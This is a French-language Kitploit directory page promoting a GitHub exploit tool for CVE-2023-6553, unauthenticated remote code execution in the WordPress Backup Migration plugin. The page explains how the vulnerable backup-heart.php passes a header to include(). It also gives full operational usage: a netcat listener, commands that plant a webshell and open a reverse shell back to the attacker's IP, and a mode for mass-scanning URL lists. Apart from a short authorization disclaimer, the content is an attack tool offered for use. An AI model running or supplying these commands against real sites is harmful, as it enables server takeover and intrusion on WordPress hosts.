Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
WordPress_Backup_Migration-RCE_Unauthenticated — Cet exploit est basé sur CVE-2023-6553 et a été construit à partir de l'exploit original de Chocapik, il a été ajouté qu'un reverse shell direct peut être obtenu. | Kitploit
Outils/GitHubGitHub/joaoaugustom/wordpress_backup_migration-rce_unauthenticated
Frameworks d'ExploitationAnalyse des VulnérabilitésExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleDéveloppement de Charges Utiles
GitHubjoaoaugustom/wordpress_backup_migration-rce_unauthenticated

WordPress_Backup_Migration-RCE_Unauthenticated

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Cet exploit est basé sur CVE-2023-6553 et a été construit à partir de l'exploit original de Chocapik, il a été ajouté qu'un reverse shell direct peut être obtenu.

Voir le dépôt
1il y a 12 joursPas encore vérifié

CVE-2023-6553 — Le plugin Backup Migration pour WordPress - Reverse Shell

Une version étendue de l'exploit CVE-2023-6553 de Chocapikk qui ajoute un mode reverse shell en une commande en plus du webshell interactif original.


Vulnérabilité

CVE-2023-6553 — Exécution de code à distance non authentifiée dans le plugin WordPress Backup Migration (versions ≤ 1.3.7).

Le plugin expose backup-heart.php, qui lit une chaîne de filtres PHP depuis l'en-tête HTTP Content-Dir et la passe à include() sans authentification ni nettoyage. Cela permet à un attaquant non authentifié d'exécuter du code PHP arbitraire en injectant une chaîne php://filter élaborée.

  • CVSS : 9.8 (Critique)
  • Plugin : Backup Migration ≤ 1.3.7
  • Référence : WPScan

Crédits

Exploit original par Chocapikk — toute la logique d'exploitation centrale (génération de chaînes de filtres, écriture de fichiers, shell interactif) est son travail. Ce dépôt ne fait que l'étendre avec un mode déclencheur de reverse shell.


Différences avec l'original

Les seuls ajouts sont :

  1. Méthode trigger_reverse_shell() — après le déploiement du webshell (même processus que l'original), envoie une unique requête GET avec la commande de reverse shell comme paramètre 0, exactement comme le ferait le shell interactif.
  2. 4 nouveaux arguments argparse — pour activer et configurer le mode reverse shell.
  3. 5 lignes dans main() — remplace interactive_shell() par trigger_reverse_shell() quand -r est présent.

Tout le reste — vérification de vulnérabilité, boucle d'écriture de fichiers, copie/suppression, mode interactif, scan multi-URL — est inchangé par rapport à l'original.


Prérequis

root@kitploit:~
pip install requests rich alive-progress prompt-toolkit php-filter-chain

Utilisation

Mode reverse shell (nouveau)

root@kitploit:~
# Lancez d'abord votre listener
rlwrap nc -lvnp 4444

# Exécutez l'exploit
python3 exploit.py -u http://TARGET/blog -r -l VOTRE_IP -p 4444

Si bash /dev/tcp n'est pas disponible sur la cible, utilisez mkfifo (dépend de nc) :

root@kitploit:~
python3 exploit.py -u http://TARGET/blog -r -l VOTRE_IP -p 4444 --shell mkfifo

Mode webshell interactif (comportement original)

root@kitploit:~
python3 exploit.py -u http://TARGET/blog

Vérification de vulnérabilité uniquement

root@kitploit:~
python3 exploit.py -u http://TARGET/blog -c

Scanner une liste d'URL

root@kitploit:~
python3 exploit.py -f urls.txt -t 10 -o vulnerable.txt

Tous les arguments

root@kitploit:~
-u / --url      URL de base cible (ex. http://target/blog)
-r / --revshell Activer le mode reverse shell
-l / --lhost    Votre IP pour recevoir le shell (obligatoire avec -r)
-p / --lport    Votre port d'écoute (défaut : 4444)
     --shell    Type de shell : bash (défaut) ou mkfifo
-c / --check    Vérifier la vulnérabilité seulement, ne pas déployer le shell
-f / --file     Fichier contenant une liste d'URL à scanner
-t / --threads  Threads pour le scan multi-URL (défaut : 5)
-o / --output   Fichier de sortie pour les résultats du scan

Fonctionnement

root@kitploit:~
1. POST /wp-content/plugins/backup-backup/includes/backup-heart.php
   Content-Dir: php://filter/...<PHP encodé>
   → Écrit le webshell caractère par caractère dans un fichier temporaire
   → Copie le fichier temporaire vers <random>.php

2. GET /wp-content/plugins/backup-backup/includes/<random>.php?0=<commande>
   → Exécute la commande via l'opérateur backtick
   → Mode interactif : boucle lisant les commandes depuis stdin
   → Mode reverse shell : envoie une ligne de commande bash/mkfifo, se connecte au listener

3. Nettoyage : unlink(<random>.php)

Avertissement

Cet outil est destiné uniquement aux tests de pénétration autorisés et à la recherche en sécurité. Ne l'utilisez pas contre des systèmes pour lesquels vous n'avez pas d'autorisation explicite de tester.

Télécharger l’outil
FonctionnalitéOriginal (Chocapikk)Cette version
Webshell interactif✅✅ (inchangé)
Reverse shell❌✅ (-r)
Scan multi-URL✅✅ (inchangé)
Nouveaux arguments—-r, -l, -p, --shell